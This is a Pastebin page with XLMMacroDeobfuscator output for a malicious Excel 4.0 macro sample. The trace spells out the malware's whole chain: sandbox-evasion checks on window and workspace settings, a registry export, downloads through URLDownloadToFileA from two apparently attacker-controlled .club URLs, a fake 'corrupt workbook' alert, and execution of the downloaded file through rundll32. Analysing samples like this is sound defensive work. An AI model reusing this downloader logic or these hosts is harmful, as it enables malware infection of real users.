Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- _ _______
- |\ /|( \ ( )
- ( \ / )| ( | () () |
- \ (_) / | | | || || |
- ) _ ( | | | |(_)| |
- / ( ) \ | | | | | |
- ( / \ )| (____/\| ) ( |
- |/ \|(_______/|/ \|
- ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
- ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
- | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
- | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
- | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
- | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
- | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
- (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
- XLMMacroDeobfuscator(v 0.1.3) - https://github.com/DissectMalware/XLMMacroDeobfuscator
- File: C:\Users\user\Downloads\33719faebf43bf99964ae15582a7dbbfe42605a203c7725913fb4c6bbf69d69f
- [Loading Cells]
- auto_open: auto_open->Sheet2!$HT$59712
- [Starting Deobfuscation]
- CELL:HT59712 , FullEvaluation , SET.VALUE(Sheet2!IJ9596,-384)
- CELL:HT59713 , FullEvaluation , GOTO(AG21387)
- CELL:AG21387 , FullEvaluation , SET.VALUE(Sheet2!GY52195,-50.25)
- CELL:AG21388 , FullEvaluation , RUN(Sheet2!HU17490)
- CELL:HU17490 , FullEvaluation , SET.VALUE(Sheet2!II36015,-424)
- CELL:HU17491 , FullEvaluation , RUN(Sheet2!DX56863)
- CELL:DX56863 , FullEvaluation , SET.VALUE(Sheet2!AN30204,15)
- CELL:DX56864 , FullEvaluation , GOTO(AL48276)
- CELL:AL48276 , FullEvaluation , SET.VALUE(Sheet2!HB58617,-378)
- CELL:AL48277 , FullEvaluation , GOTO(HE48767)
- CELL:HE48767 , FullEvaluation , SET.VALUE(Sheet2!AZ18076,348)
- CELL:HE48768 , FullEvaluation , RUN(Sheet2!GC38061)
- CELL:GC38061 , FullEvaluation , SET.VALUE(Sheet2!ED33513,-244)
- CELL:GC38062 , FullEvaluation , RUN(Sheet2!GK49742)
- CELL:GK49742 , FullEvaluation , SET.VALUE(Sheet2!GV40795,479)
- CELL:GK49743 , FullEvaluation , RUN(Sheet2!DK20776)
- CELL:DK20776 , FullEvaluation , SET.VALUE(Sheet2!FP3792,-59)
- CELL:DK20777 , FullEvaluation , RUN(Sheet2!DK24943)
- CELL:DK24943 , FullEvaluation , SET.VALUE(Sheet2!HN2684,-218)
- CELL:DK24944 , FullEvaluation , RUN(Sheet2!BB26751)
- CELL:BB26751 , FullEvaluation , FORMULA("=CLOSE(FALSE)",Sheet2!HQ31495)
- CELL:BB26752 , FullEvaluation , GOTO(GU63993)
- CELL:GU63993 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",Sheet2!GU63994)
- CELL:GU63994 , PartialEvaluation , APP.MAXIMIZE()
- CELL:GU63995 , FullEvaluation , GOTO(DY16980)
- CELL:DY16980 , FullEvaluation , FORMULA("=IF(GET.WINDOW(7),GOTO(R[14514]C[96]),)",Sheet2!DY16981)
- CELL:DY16981 , FullEvaluation , IF(GET.WINDOW(7),GOTO(R[14514]C[96]),)
- CELL:DY16982 , FullEvaluation , RUN(Sheet2!X59768)
- CELL:X59768 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R[-28274]C[201]))",Sheet2!X59769)
- CELL:X59769 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R[-28274]C[201]))
- CELL:X59770 , FullEvaluation , GOTO(N10466)
- CELL:N10466 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R[21028]C[211]),)",Sheet2!N10467)
- CELL:N10467 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R[21028]C[211]),)
- CELL:N10468 , FullEvaluation , GOTO(DA11989)
- CELL:DA11989 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R[19505]C[120]),)",Sheet2!DA11990)
- CELL:DA11990 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R[19505]C[120]),)
- CELL:DA11991 , FullEvaluation , GOTO(GG418)
- CELL:GG418 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R[31076]C[36]),)",Sheet2!GG419)
- CELL:GG419 , FullEvaluation , IF(GET.WORKSPACE(13)<770,GOTO(R[31076]C[36]),)
- CELL:GG420 , FullEvaluation , RUN(Sheet2!FJ54706)
- CELL:FJ54706 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R[-23212]C[59]),)",Sheet2!FJ54707)
- CELL:FJ54707 , FullEvaluation , IF(GET.WORKSPACE(14)<390,GOTO(R[-23212]C[59]),)
- CELL:FJ54708 , FullEvaluation , RUN(Sheet2!DS37251)
- CELL:DS37251 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R[-5757]C[102]))",Sheet2!DS37252)
- CELL:DS37252 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R[-5757]C[102]))
- CELL:DS37253 , FullEvaluation , GOTO(ED41335)
- CELL:ED41335 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R[-9841]C[91]))",Sheet2!ED41336)
- CELL:ED41336 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R[-9841]C[91]))
- CELL:ED41337 , FullEvaluation , RUN(Sheet2!AS51609)
- CELL:AS51609 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R[-20115]C[180]))",Sheet2!AS51610)
- CELL:AS51610 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R[-20115]C[180]))
- CELL:AS51610 , FullEvaluation , [TRUE]
- CELL:AS51611 , FullEvaluation , GOTO(FA48687)
- CELL:FA48687 , FullEvaluation , FORMULA("=""EXPORT HKCU\Software\Microsoft\Office\""",Sheet2!AF47942)
- CELL:FA48688 , FullEvaluation , GOTO(FP63244)
- CELL:FP63244 , FullEvaluation , FORMULA("=""C:\Users\Public\9P8BL.reg""",Sheet2!FL62273)
- CELL:FP63245 , FullEvaluation , RUN(Sheet2!U61287)
- CELL:U61287 , FullEvaluation , FORMULA("=R[-15427]C[-64]&GET.WORKSPACE(2)&""\Excel\Security ""&R[-1096]C[72]&"" /y""",Sheet2!CR63369)
- CELL:U61288 , FullEvaluation , GOTO(HO48351)
- CELL:HO48351 , FullEvaluation , FORMULA("=""C:\Windows\system32\reg.exe""",Sheet2!EP31804)
- CELL:HO48352 , FullEvaluation , RUN(Sheet2!HS62292)
- CELL:HS62292 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-30489]C[-81],R[1076]C[-131],0,5)",Sheet2!HS62293)
- CELL:HS62293 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","GET.WORKSPACE(2)\Excel\Security /y",0,5)
- CELL:HS62294 , FullEvaluation , RUN(Sheet2!IH52343)
- CELL:IH52343 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R[9927]C[-74])))",Sheet2!IH52346)
- CELL:IH52344 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",Sheet2!IH52347)
- CELL:IH52345 , FullEvaluation , FORMULA("=NEXT()",Sheet2!IH52348)
- CELL:IH52346 , PartialEvaluation , WHILE(ISERROR(FILES("C:\Users\Public\9P8BL.reg")))
- CELL:IH52347 , PartialEvaluation , WAIT("NOW()+""00:00:01""")
- CELL:IH52348 , PartialEvaluation , NEXT()
- CELL:IH52349 , FullEvaluation , RUN(Sheet2!HS55844)
- CELL:HS55844 , FullEvaluation , FORMULA("=FOPEN(R[6428]C[-59])",Sheet2!HS55845)
- CELL:HS55845 , PartialEvaluation , FOPEN("C:\Users\Public\9P8BL.reg")
- CELL:HS55846 , FullEvaluation , RUN(Sheet2!AB41868)
- CELL:AB41868 , FullEvaluation , FORMULA("=FPOS(R[13976]C[199],215)",Sheet2!AB41869)
- CELL:AB41869 , PartialEvaluation , FPOS("FOPEN(""C:\Users\Public\9P8BL.reg"")",215)
- CELL:AB41870 , FullEvaluation , RUN(Sheet2!HA21230)
- CELL:HA21230 , FullEvaluation , FORMULA("=FREAD(R[34614]C[18],255)",Sheet2!HA21231)
- CELL:HA21231 , PartialEvaluation , FREAD("FOPEN(""C:\Users\Public\9P8BL.reg"")",255)
- CELL:HA21232 , FullEvaluation , RUN(Sheet2!AM17289)
- CELL:AM17289 , FullEvaluation , FORMULA("=FCLOSE(R[38555]C[188])",Sheet2!AM17290)
- CELL:AM17290 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\9P8BL.reg"")")
- CELL:AM17291 , FullEvaluation , GOTO(CJ61198)
- CELL:CJ61198 , FullEvaluation , FORMULA("=FILE.DELETE(R[1074]C[80])",Sheet2!CJ61199)
- CELL:CJ61199 , PartialEvaluation , FILE.DELETE("C:\Users\Public\9P8BL.reg")
- CELL:CJ61200 , FullEvaluation , RUN(Sheet2!HL8081)
- CELL:HL8081 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[13149]C[-11])),GOTO(R[23413]C[5]),)",Sheet2!HL8082)
- CELL:HL8082 , FullBranching , IF(ISNUMBER(SEARCH("0001",R[13149]C[-11])),GOTO(R[23413]C[5]),)
- CELL:HL8082 , FullEvaluation , [TRUE] GOTO(R[23413]C[5])
- CELL:HQ31495 , End , CLOSE(FALSE)
- CELL:HL8082 , FullEvaluation , [FALSE]
- CELL:HL8083 , FullEvaluation , RUN(Sheet2!BG35275)
- CELL:BG35275 , FullEvaluation , FORMULA("=""C:\Users\Public\IYNI.html""",Sheet2!L38143)
- CELL:BG35276 , FullEvaluation , GOTO(DG2112)
- CELL:DG2112 , FullEvaluation , FORMULA("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",Sheet2!FU50289)
- CELL:DG2113 , FullEvaluation , RUN(Sheet2!AE58006)
- CELL:AE58006 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-7718]C[146],R[-19864]C[-19],0,0)",Sheet2!AE58007)
- CELL:AE58007 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates","C:\Users\Public\IYNI.html",0,0)
- CELL:AE58008 , FullEvaluation , GOTO(HH2203)
- CELL:HH2203 , FullEvaluation , FORMULA("=FILES(R[35939]C[-204])",Sheet2!HH2204)
- CELL:HH2204 , PartialEvaluation , FILES("C:\Users\Public\IYNI.html")
- CELL:HH2205 , FullEvaluation , RUN(Sheet2!GU20999)
- CELL:GU20999 , FullEvaluation , FORMULA("=IF(ISERROR(R[-18796]C[13]),GOTO(R[10495]C[22]),)",Sheet2!GU21000)
- CELL:GU21000 , FullBranching , IF(ISERROR(R[-18796]C[13]),GOTO(R[10495]C[22]),)
- CELL:GU21000 , FullEvaluation , [TRUE] GOTO(R[10495]C[22])
- CELL:HQ31495 , End , CLOSE(FALSE)
- CELL:GU21000 , FullEvaluation , [FALSE]
- CELL:GU21001 , FullEvaluation , RUN(Sheet2!GP10315)
- CELL:GP10315 , FullEvaluation , SET.VALUE(Sheet2!A1626,214)
- CELL:GP10316 , FullEvaluation , GOTO(CQ36304)
- CELL:CQ36304 , FullEvaluation , SET.VALUE(Sheet2!IM10026,-162)
- CELL:CQ36305 , FullEvaluation , RUN(Sheet2!C21349)
- CELL:C21349 , FullEvaluation , SET.VALUE(Sheet2!DB6239,-293)
- CELL:C21350 , FullEvaluation , RUN(Sheet2!HD9329)
- CELL:HD9329 , FullEvaluation , SET.VALUE(Sheet2!AT45907,-65)
- CELL:HD9330 , FullEvaluation , GOTO(GI63368)
- CELL:GI63368 , FullEvaluation , SET.VALUE(Sheet2!AH38851,-52.25)
- CELL:GI63369 , FullEvaluation , GOTO(ET46416)
- CELL:ET46416 , FullEvaluation , SET.VALUE(Sheet2!BW44660,-36)
- CELL:ET46417 , FullEvaluation , RUN(Sheet2!BU4702)
- CELL:BU4702 , FullEvaluation , SET.VALUE(Sheet2!IJ26702,83)
- CELL:BU4703 , FullEvaluation , RUN(Sheet2!HK45441)
- CELL:HK45441 , FullEvaluation , SET.VALUE(Sheet2!HX58665,235)
- CELL:HK45442 , FullEvaluation , GOTO(CP20663)
- CELL:CP20663 , FullEvaluation , SET.VALUE(Sheet2!CI20337,17.5)
- CELL:CP20664 , FullEvaluation , RUN(Sheet2!IF25037)
- CELL:IF25037 , FullEvaluation , SET.VALUE(Sheet2!IU16716,430)
- CELL:IF25038 , FullEvaluation , RUN(Sheet2!DK58580)
- CELL:DK58580 , FullEvaluation , FORMULA("=""C:\Users\Public\NvZsap.html""",Sheet2!HL64438)
- CELL:DK58581 , FullEvaluation , GOTO(BU10983)
- CELL:BU10983 , FullEvaluation , FORMULA("=""https://activediscounts.club/wp-data.php""",Sheet2!CM18954)
- CELL:BU10984 , FullEvaluation , RUN(Sheet2!BC4497)
- CELL:BC4497 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-17736]C[-13],R[27748]C[116],0,0)",Sheet2!CZ36690)
- CELL:BC4498 , FullEvaluation , GOTO(CW5342)
- CELL:CW5342 , FullEvaluation , FORMULA("=FILES(R[114]C[150])",Sheet2!BR64324)
- CELL:CW5343 , FullEvaluation , RUN(Sheet2!DJ35113)
- CELL:DJ35113 , FullEvaluation , FORMULA("=IF(ISERROR(R[46031]C[-28]),,RUN(R[-6570]C[-83]))",Sheet2!CT18293)
- CELL:DJ35114 , FullEvaluation , RUN(Sheet2!EI26842)
- CELL:EI26842 , FullEvaluation , FORMULA("=""https://hackcheatsonline.club/wp-data.php""",Sheet2!T16882)
- CELL:EI26843 , FullEvaluation , RUN(Sheet2!IC16090)
- CELL:IC16090 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-28101]C[-88],R[19455]C[112],0,0)",Sheet2!DD44983)
- CELL:IC16091 , FullEvaluation , GOTO(FY11752)
- CELL:FY11752 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",Sheet2!AU55970)
- CELL:FY11753 , FullEvaluation , GOTO(EU6902)
- CELL:EU6902 , FullEvaluation , FORMULA("=ALERT(R[44247]C[32])",Sheet2!O11723)
- CELL:EU6903 , FullEvaluation , GOTO(GP57037)
- CELL:GP57037 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",Sheet2!DX21867)
- CELL:GP57038 , FullEvaluation , RUN(Sheet2!DT43174)
- CELL:DT43174 , FullEvaluation , FORMULA("=R[58909]C[191]&"",DllRegisterServer""",Sheet2!AC5529)
- CELL:DT43175 , FullEvaluation , GOTO(AV52824)
- CELL:AV52824 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[14289]C[-123],R[-2049]C[-222],0,5)",Sheet2!IQ7578)
- CELL:AV52825 , FullEvaluation , RUN(Sheet2!CZ36690)
- CELL:CZ36690 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://activediscounts.club/wp-data.php","C:\Users\Public\NvZsap.html",0,0)
- CELL:CZ36691 , FullEvaluation , GOTO(BR64324)
- CELL:BR64324 , PartialEvaluation , FILES("C:\Users\Public\NvZsap.html")
- CELL:BR64325 , FullEvaluation , GOTO(CT18293)
- CELL:CT18293 , FullBranching , IF(ISERROR(R[46031]C[-28]),,RUN(R[-6570]C[-83]))
- CELL:CT18293 , FullEvaluation , [TRUE]
- CELL:CT18294 , FullEvaluation , GOTO(T16882)
- CELL:T16882 , FullEvaluation , "https://hackcheatsonline.club/wp-data.php"
- CELL:T16883 , FullEvaluation , GOTO(DD44983)
- CELL:DD44983 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://hackcheatsonline.club/wp-data.php","C:\Users\Public\NvZsap.html",0,0)
- CELL:DD44984 , FullEvaluation , GOTO(AU55970)
- CELL:AU55970 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:AU55971 , FullEvaluation , GOTO(O11723)
- CELL:O11723 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:O11724 , FullEvaluation , RUN(Sheet2!DX21867)
- CELL:DX21867 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
- CELL:DX21868 , FullEvaluation , RUN(Sheet2!AC5529)
- CELL:AC5529 , FullEvaluation , "C:\Users\Public\NvZsap.html,DllRegisterServer"
- CELL:AC5530 , FullEvaluation , RUN(Sheet2!IQ7578)
- CELL:IQ7578 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\NvZsap.html,DllRegisterServer",0,5)
- CELL:IQ7579 , FullEvaluation , GOTO(HQ31495)
- CELL:HQ31495 , End , CLOSE(FALSE)
- CELL:CT18293 , FullEvaluation , [FALSE] RUN(Sheet2!O11723)
- CELL:O11723 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:O11724 , FullEvaluation , RUN(Sheet2!DX21867)
- CELL:DX21867 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
- CELL:DX21868 , FullEvaluation , RUN(Sheet2!AC5529)
- CELL:AC5529 , FullEvaluation , "C:\Users\Public\NvZsap.html,DllRegisterServer"
- CELL:AC5530 , FullEvaluation , RUN(Sheet2!IQ7578)
- CELL:IQ7578 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\NvZsap.html,DllRegisterServer",0,5)
- CELL:IQ7579 , FullEvaluation , GOTO(HQ31495)
- CELL:HQ31495 , End , CLOSE(FALSE)
- CELL:AS51610 , FullEvaluation , [FALSE] GOTO(R[-20115]C[180])
- CELL:HQ31495 , End , CLOSE(FALSE)
- [END of Deobfuscation]
- time elapsed: 5.855288743972778
Add Comment
Please, Sign In to add comment